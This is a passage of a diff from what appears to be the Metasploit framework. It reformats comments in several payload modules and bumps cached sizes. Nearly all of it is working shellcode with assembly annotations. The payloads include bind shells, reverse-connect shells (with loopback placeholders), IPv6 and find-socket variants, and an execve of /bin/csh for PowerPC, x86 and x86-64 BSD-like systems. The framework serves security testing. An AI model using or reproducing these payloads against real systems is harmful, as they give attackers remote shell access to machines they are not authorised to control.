"\x7f\x08\x02\xa6" + # mflr r24 #
|
||||
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
@cal_execve +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"/bin/csh"
|
||||
|
||||
# If the payload is generated and there are offsets to substitute,
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 692904
|
||||
CachedSize = 692988
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 692904
|
||||
CachedSize = 692988
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
|
|||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 692904
|
||||
CachedSize = 692988
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
|
|
@ -33,52 +33,52 @@ module MetasploitModule
|
|||
'LPORT' => [ 20, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x6a\x61" +# pushq $0x61 #
|
||||
"\x58" +# pop %rax #
|
||||
"\x99" +# cltd #
|
||||
"\x6a\x1c" +# pushq $0x1c #
|
||||
"\x5f" +# pop %rdi #
|
||||
"\x6a\x01" +# pushq $0x1 #
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x97" +# xchg %rax,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x52" +# push %rdx #
|
||||
"\x52" +# push %rdx #
|
||||
"\xba\x00\x1c\x11\x5C" +# mov edx,0x5c111c00 #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x6a\x1c" +# pushq $0x1c #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x04\x4c" +# add $0x4c,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x31\xf6" +# xor %rsi,%rsi #
|
||||
"\x6a\x6a" +# pushq $0x6a #
|
||||
"\x58" +# pop %rax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x99" +# cltd #
|
||||
"\x04\x1e" +# add $0x1e,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x89\xc7" +# mov %rax,%rdi #
|
||||
"\x6a\x5a" +# pushq $0x5a #
|
||||
"\x58" +# pop %rax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x5a" +# add $0x5a,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x59" +# add $0x59,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe7" +# mov %rsp,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x04\x39" +# add $0x39,%al #
|
||||
"\x0f\x05" # syscall #
|
||||
"\x6a\x61" + # pushq $0x61 #
|
||||
"\x58" + # pop %rax #
|
||||
"\x99" + # cltd #
|
||||
"\x6a\x1c" + # pushq $0x1c #
|
||||
"\x5f" + # pop %rdi #
|
||||
"\x6a\x01" + # pushq $0x1 #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x97" + # xchg %rax,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x52" + # push %rdx #
|
||||
"\x52" + # push %rdx #
|
||||
"\xba\x00\x1c\x11\x5C" + # mov edx,0x5c111c00 #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x6a\x1c" + # pushq $0x1c #
|
||||
"\x5a" + # pop %rdx #
|
||||
"\x04\x4c" + # add $0x4c,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x31\xf6" + # xor %rsi,%rsi #
|
||||
"\x6a\x6a" + # pushq $0x6a #
|
||||
"\x58" + # pop %rax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x99" + # cltd #
|
||||
"\x04\x1e" + # add $0x1e,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x89\xc7" + # mov %rax,%rdi #
|
||||
"\x6a\x5a" + # pushq $0x5a #
|
||||
"\x58" + # pop %rax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x5a" + # add $0x5a,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x59" + # add $0x59,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" + # mov "in/sh",%rdi #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe7" + # mov %rsp,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x04\x39" + # add $0x39,%al #
|
||||
"\x0f\x05" # syscall #
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -33,50 +33,50 @@ module MetasploitModule
|
|||
'LPORT' => [ 18, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x6a\x61" +# pushq $0x61 #
|
||||
"\x58" +# pop %rax #
|
||||
"\x99" +# cltd #
|
||||
"\x6a\x02" +# pushq $0x2 #
|
||||
"\x5f" +# pop %rdi #
|
||||
"\x6a\x01" +# pushq $0x1 #
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x97" +# xchg %rax,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x6a\x10" +# pushq $0x10 #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x04\x66" +# add $0x66,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x31\xf6" +# xor %rsi,%rsi #
|
||||
"\x6a\x6a" +# pushq $0x6a #
|
||||
"\x58" +# pop %rax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x99" +# cltd #
|
||||
"\x04\x1e" +# add $0x1e,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x89\xc7" +# mov %rax,%rdi #
|
||||
"\x6a\x5a" +# pushq $0x5a #
|
||||
"\x58" +# pop %rax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x5a" +# add $0x5a,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x59" +# add $0x59,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbf\x2f\x2f" +# mov "//" #
|
||||
"\x62\x69\x6e\x2f" +# "bin/sh" #
|
||||
"\x73\x68" +# mov $0x68732f6e69622f2f,%rdi #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe7" +# mov %rsp,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x04\x39" +# add $0x39,%al #
|
||||
"\x6a\x61" + # pushq $0x61 #
|
||||
"\x58" + # pop %rax #
|
||||
"\x99" + # cltd #
|
||||
"\x6a\x02" + # pushq $0x2 #
|
||||
"\x5f" + # pop %rdi #
|
||||
"\x6a\x01" + # pushq $0x1 #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x97" + # xchg %rax,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\xba\x00\x02\x11\x5C" + # mov edx,0x5c110200 #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x6a\x10" + # pushq $0x10 #
|
||||
"\x5a" + # pop %rdx #
|
||||
"\x04\x66" + # add $0x66,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x31\xf6" + # xor %rsi,%rsi #
|
||||
"\x6a\x6a" + # pushq $0x6a #
|
||||
"\x58" + # pop %rax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x99" + # cltd #
|
||||
"\x04\x1e" + # add $0x1e,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x89\xc7" + # mov %rax,%rdi #
|
||||
"\x6a\x5a" + # pushq $0x5a #
|
||||
"\x58" + # pop %rax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x5a" + # add $0x5a,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x59" + # add $0x59,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbf\x2f\x2f" + # mov "//" #
|
||||
"\x62\x69\x6e\x2f" + # "bin/sh" #
|
||||
"\x73\x68" + # mov $0x68732f6e69622f2f,%rdi #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe7" + # mov %rsp,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x04\x39" + # add $0x39,%al #
|
||||
"\x0f\x05" # syscall #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -35,51 +35,51 @@ module MetasploitModule
|
|||
'SCOPEID' => [ 101, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x6a\x61" +# pushq $0x61 #
|
||||
"\x58" +# pop %rax #
|
||||
"\x99" +# cltd #
|
||||
"\x6a\x1c" +# pushq $0x1c #
|
||||
"\x5f" +# pop %rdi #
|
||||
"\x6a\x01" +# pushq $0x1 #
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x97" +# xchg %rax,%rdi #
|
||||
"\x04\x3e" +# add $0x3e,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x59" +# add $0x59,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xce" +# dec %esi #
|
||||
"\xff\xce" +# dec %esi #
|
||||
"\x04\x58" +# add $0x58,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
|
||||
"\x6a\x61" + # pushq $0x61 #
|
||||
"\x58" + # pop %rax #
|
||||
"\x99" + # cltd #
|
||||
"\x6a\x1c" + # pushq $0x1c #
|
||||
"\x5f" + # pop %rdi #
|
||||
"\x6a\x01" + # pushq $0x1 #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x97" + # xchg %rax,%rdi #
|
||||
"\x04\x3e" + # add $0x3e,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x59" + # add $0x59,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xce" + # dec %esi #
|
||||
"\xff\xce" + # dec %esi #
|
||||
"\x04\x58" + # add $0x58,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xe9\x23\x00\x00\x00" + # jmpq <forth> #
|
||||
# back:
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x6a\x1c" +# pushq $0x1c #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x66\x83\xc0\x62" +# add $0x62,%ax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x99" +# cltd #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" +# "in/sh",%rdi #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe7" +# mov %rsp,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x04\x3b" +# add $0x3b,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x6a\x1c" + # pushq $0x1c #
|
||||
"\x5a" + # pop %rdx #
|
||||
"\x66\x83\xc0\x62" + # add $0x62,%ax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x99" + # cltd #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" + # "in/sh",%rdi #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe7" + # mov %rsp,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x04\x3b" + # add $0x3b,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
# forth:
|
||||
"\xe8\xd8\xff\xff\xff" +# callq <back> #
|
||||
"\xe8\xd8\xff\xff\xff" + # callq <back> #
|
||||
# sockaddr_in6
|
||||
"\x00\x1c\x11\x5c" +# AF_INET6+port #
|
||||
"\x00\x00\x00\x00" +# no-one-cares #
|
||||
"\x00\x00\x00\x00" +# IPv6- #
|
||||
"\x00\x00\x00\x00" +# addr- #
|
||||
"\x00\x00\x00\x00" +# in- #
|
||||
"\x00\x00\x00\x01" +# 16 bytes #
|
||||
"\x00\x1c\x11\x5c" + # AF_INET6+port #
|
||||
"\x00\x00\x00\x00" + # no-one-cares #
|
||||
"\x00\x00\x00\x00" + # IPv6- #
|
||||
"\x00\x00\x00\x00" + # addr- #
|
||||
"\x00\x00\x00\x00" + # in- #
|
||||
"\x00\x00\x00\x01" + # 16 bytes #
|
||||
"\x00\x00\x00\x00" # Scope ID #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -34,43 +34,43 @@ module MetasploitModule
|
|||
'LPORT' => [ 37, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x6a\x61" +# pushq $0x61 #
|
||||
"\x58" +# pop %rax #
|
||||
"\x99" +# cltd #
|
||||
"\x6a\x02" +# pushq $0x2 #
|
||||
"\x5f" +# pop %rdi #
|
||||
"\x6a\x01" +# pushq $0x1 #
|
||||
"\x5e" +# pop %rsi #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x48\x97" +# xchg %rax,%rdi #
|
||||
"\x04\x58" +# add $0x58,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xc6" +# inc %esi #
|
||||
"\x04\x59" +# add $0x59,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\xff\xce" +# dec %esi #
|
||||
"\xff\xce" +# dec %esi #
|
||||
"\x04\x58" +# add $0x58,%al #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbb\x00\x02\x11" +# mov ... #
|
||||
"\x5c\x7f\x00\x00\x01" +# mov $0x100007f5c110200,%rbx #
|
||||
"\x53" +# push %rbx #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x6a\x10" +# pushq $0x10 #
|
||||
"\x5a" +# pop %rdx #
|
||||
"\x66\x83\xc0\x62" +# add $0x62,%ax #
|
||||
"\x0f\x05" +# syscall #
|
||||
"\x99" +# cltd #
|
||||
"\x52" +# push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" +# "in/sh", %rdi #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe7" +# mov %rsp,%rdi #
|
||||
"\x52" +# push %rdx #
|
||||
"\x57" +# push %rdi #
|
||||
"\x48\x89\xe6" +# mov %rsp,%rsi #
|
||||
"\x04\x3b" +# add $0x3b,%al #
|
||||
"\x6a\x61" + # pushq $0x61 #
|
||||
"\x58" + # pop %rax #
|
||||
"\x99" + # cltd #
|
||||
"\x6a\x02" + # pushq $0x2 #
|
||||
"\x5f" + # pop %rdi #
|
||||
"\x6a\x01" + # pushq $0x1 #
|
||||
"\x5e" + # pop %rsi #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x48\x97" + # xchg %rax,%rdi #
|
||||
"\x04\x58" + # add $0x58,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xc6" + # inc %esi #
|
||||
"\x04\x59" + # add $0x59,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\xff\xce" + # dec %esi #
|
||||
"\xff\xce" + # dec %esi #
|
||||
"\x04\x58" + # add $0x58,%al #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbb\x00\x02\x11" + # mov ... #
|
||||
"\x5c\x7f\x00\x00\x01" + # mov $0x100007f5c110200,%rbx #
|
||||
"\x53" + # push %rbx #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x6a\x10" + # pushq $0x10 #
|
||||
"\x5a" + # pop %rdx #
|
||||
"\x66\x83\xc0\x62" + # add $0x62,%ax #
|
||||
"\x0f\x05" + # syscall #
|
||||
"\x99" + # cltd #
|
||||
"\x52" + # push %rdx #
|
||||
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
|
||||
"\x69\x6e\x2f\x73\x68" + # "in/sh", %rdi #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe7" + # mov %rsp,%rdi #
|
||||
"\x52" + # push %rdx #
|
||||
"\x57" + # push %rdi #
|
||||
"\x48\x89\xe6" + # mov %rsp,%rsi #
|
||||
"\x04\x3b" + # add $0x3b,%al #
|
||||
"\x0f\x05" # syscall #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,43 +32,43 @@ module MetasploitModule
|
|||
'LPORT' => [ 6, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
|
||||
"\x89\xe7" +# movl %esp,%edi #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x01" +# pushl $0x01 #
|
||||
"\x6a\x02" +# pushl $0x02 #
|
||||
"\x6a\x10" +# pushl $0x10 #
|
||||
"\xb0\x61" +# movb $0x61,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x57" +# pushl %edi #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x68" +# pushl $0x68 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x89\x47\xec" +# movl %eax,-0x14(%edi) #
|
||||
"\xb0\x6a" +# movb $0x6a,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xb0\x1e" +# movb $0x1e,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x5a" +# pushl $0x5a #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xff\x4f\xe4" +# decl -0x1c(%edi) #
|
||||
"\x79\xf6" +# jns <bndsockcode+42> #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x54" +# pushl %esp #
|
||||
"\x53" +# pushl %ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x3b" +# movb $0x3b,%al #
|
||||
"\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x68\xff\x02\x04\xd2" + # pushl $0xd20402ff #
|
||||
"\x89\xe7" + # movl %esp,%edi #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x01" + # pushl $0x01 #
|
||||
"\x6a\x02" + # pushl $0x02 #
|
||||
"\x6a\x10" + # pushl $0x10 #
|
||||
"\xb0\x61" + # movb $0x61,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x57" + # pushl %edi #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x68" + # pushl $0x68 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x89\x47\xec" + # movl %eax,-0x14(%edi) #
|
||||
"\xb0\x6a" + # movb $0x6a,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xb0\x1e" + # movb $0x1e,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x5a" + # pushl $0x5a #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xff\x4f\xe4" + # decl -0x1c(%edi) #
|
||||
"\x79\xf6" + # jns <bndsockcode+42> #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x54" + # pushl %esp #
|
||||
"\x53" + # pushl %ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x3b" + # movb $0x3b,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,38 +32,38 @@ module MetasploitModule
|
|||
'CPORT' => [ 25, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x89\xe7" +# movl %esp,%edi #
|
||||
"\x6a\x10" +# pushl $0x10 #
|
||||
"\x54" +# pushl %esp #
|
||||
"\x57" +# pushl %edi #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x58" +# popl %eax #
|
||||
"\x58" +# popl %eax #
|
||||
"\x40" +# incl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x1f" +# pushl $0x1f #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x66\x81\x7f\x02\x04\xd2"+# cmpw $0xd204,0x02(%edi) #
|
||||
"\x75\xee" +# jne <fndsockcode+11> #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x5a" +# pushl $0x5a #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xff\x4f\xf0" +# decl -0x10(%edi) #
|
||||
"\x79\xf6" +# jns <fndsockcode+30> #
|
||||
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x54" +# pushl %esp #
|
||||
"\x53" +# pushl %ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x3b" +# movb $0x3b,%al #
|
||||
"\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x89\xe7" + # movl %esp,%edi #
|
||||
"\x6a\x10" + # pushl $0x10 #
|
||||
"\x54" + # pushl %esp #
|
||||
"\x57" + # pushl %edi #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x58" + # popl %eax #
|
||||
"\x58" + # popl %eax #
|
||||
"\x40" + # incl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x1f" + # pushl $0x1f #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x66\x81\x7f\x02\x04\xd2"+ # cmpw $0xd204,0x02(%edi) #
|
||||
"\x75\xee" + # jne <fndsockcode+11> #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x5a" + # pushl $0x5a #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xff\x4f\xf0" + # decl -0x10(%edi) #
|
||||
"\x79\xf6" + # jns <fndsockcode+30> #
|
||||
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x54" + # pushl %esp #
|
||||
"\x53" + # pushl %ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x3b" + # movb $0x3b,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
}
|
||||
))
|
||||
|
|
|
@ -33,36 +33,36 @@ module MetasploitModule
|
|||
'LPORT' => [ 8, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x68\x7f\x00\x00\x01" +# pushl $0x0100007f #
|
||||
"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
|
||||
"\x89\xe7" +# movl %esp,%edi #
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x01" +# pushl $0x01 #
|
||||
"\x6a\x02" +# pushl $0x02 #
|
||||
"\x6a\x10" +# pushl $0x10 #
|
||||
"\xb0\x61" +# movb $0x61,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x57" +# pushl %edi #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x62" +# pushl $0x62 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x6a\x5a" +# pushl $0x5a #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xff\x4f\xe8" +# decl -0x18(%edi) #
|
||||
"\x79\xf6" +# jns <cntsockcode+34> #
|
||||
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x54" +# pushl %esp #
|
||||
"\x53" +# pushl %ebx #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x3b" +# movb $0x3b,%al #
|
||||
"\x68\x7f\x00\x00\x01" + # pushl $0x0100007f #
|
||||
"\x68\xff\x02\x04\xd2" + # pushl $0xd20402ff #
|
||||
"\x89\xe7" + # movl %esp,%edi #
|
||||
"\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x01" + # pushl $0x01 #
|
||||
"\x6a\x02" + # pushl $0x02 #
|
||||
"\x6a\x10" + # pushl $0x10 #
|
||||
"\xb0\x61" + # movb $0x61,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x57" + # pushl %edi #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x62" + # pushl $0x62 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x6a\x5a" + # pushl $0x5a #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xff\x4f\xe8" + # decl -0x18(%edi) #
|
||||
"\x79\xf6" + # jns <cntsockcode+34> #
|
||||
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
|
||||
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x54" + # pushl %esp #
|
||||
"\x53" + # pushl %ebx #
|
||||
"\x50" + # pushl %eax #
|
||||
